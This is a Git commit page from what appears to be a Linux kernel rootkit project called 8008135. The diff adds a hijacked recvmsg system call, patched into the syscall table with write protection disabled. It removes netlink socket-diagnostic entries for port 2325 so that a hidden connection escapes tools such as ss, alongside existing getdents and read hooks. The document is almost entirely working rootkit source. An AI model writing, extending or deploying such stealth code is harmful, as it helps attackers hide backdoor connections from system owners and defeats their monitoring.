valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Socket von ss verstecken

Browse Source
This commit is contained in:
Jan Koerner 2019-12-08 13:33:50 +01:00
parent 7a486df14c
commit 3e30a6df32
3 changed files with 86 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
src/8008135.c
View File

@ -35,11 +35,13 @@ static int __init init_8008135(void) {
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
wprotectionoff(); wprotectionoff();
sys_call_table[__NR_getdents] = sys_getdents_new; sys_call_table[__NR_getdents] = sys_getdents_new;
sys_call_table[__NR_read] = sys_read_fake; sys_call_table[__NR_read] = sys_read_fake;
sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
wprotectionon(); wprotectionon();
@ -63,6 +65,7 @@ static void __exit exit_8008135(void) {
sys_call_table[__NR_getdents] = sys_getdents_orig; sys_call_table[__NR_getdents] = sys_getdents_orig;
sys_call_table[__NR_read] = sys_read_orig; sys_call_table[__NR_read] = sys_read_orig;
sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
wprotectionon(); wprotectionon();
} }

77
src/h1d3p0r7.c
View File

@ -27,6 +27,7 @@
*******************************************************************************/ *******************************************************************************/
sys_read_ptr sys_read_orig; sys_read_ptr sys_read_orig;
original_recvmsg_syscall sys_recvmsg_orig;
/*******************************************************************************/ /*******************************************************************************/
@ -106,3 +107,79 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
// return number of bytes read // return number of bytes read
return result; return result;
} }
/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
`recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
socket with the help of some netlink utility macros. If a netlink socket is being used, we
iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
source and destination ports with our list of hidden ones. In order to hide an entry we copy
the remaining entries over it and adjust the data length which is returned to the user. */
asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
{
long ret;
struct nlmsghdr *nlh;
long count;
int found;
char *stream;
int offset;
int i;
struct inet_diag_msg *r;
int port;
/* Call original `recvmsg` syscall */
ret = sys_recvmsg_orig(sockfd, msg, flags);
/* Some error occured. Don't do anything. */
if (ret < 0)
return ret;
/* Extract netlink message header from message */
nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
/* Number of bytes remaining in message stream */
count = ret;
/* Set flag specifying whether message contains data to be masked */
found = 1;
/* NLMSG_OK: This macro will return true if a netlink message was received. It
essentially checks whether it's safe to parse the netlink message (if indeed
is a netlink message) using the other NLMSG_* macros. */
while (NLMSG_OK(nlh, count)) {
if (found == 0)
/* NLMSG_NEXT: Many netlink protocols have request messages that result
in multiple response messages. In these cases, multiple responses will
be copied into the `msg` buffer. This macro can be used to walk the
chain of responses. Returns NULL in the event the message is the last
in the chain for the given buffer. */
nlh = NLMSG_NEXT(nlh, count);
r = NLMSG_DATA(nlh);
port = ntohs(r->id.idiag_sport);
if(port == 2325){
/* Message contains data to be masked */
found = 1;
}else{
found = 0;
continue;
}
stream = (char *) nlh;
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
/* Copy remaining entries over the data to be masked */
for (i=0 ; i<count ; i++)
stream[i] = stream[i + offset];
/* Adjust the data length */
ret -= offset;
}
return ret;
}

8
src/headers/h1d3p0r7.h
View File

@ -36,23 +36,27 @@
#include <linux/version.h> #include <linux/version.h>
#include <net/tcp.h> #include <net/tcp.h>
#include <net/udp.h> #include <net/udp.h>
#include <linux/inet_diag.h> /* Needed for ntohs */
#define __NR_read 0 #define __NR_read 0
#define __NR_recvmsg 47
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
char __user *buf, char __user *buf,
size_t count); size_t count);
typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
/**** var ********************************************************************** /**** var **********************************************************************
*******************************************************************************/ *******************************************************************************/
extern sys_read_ptr sys_read_orig; extern sys_read_ptr sys_read_orig;
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count); size_t count);
extern original_recvmsg_syscall sys_recvmsg_orig;
extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
#endif #endif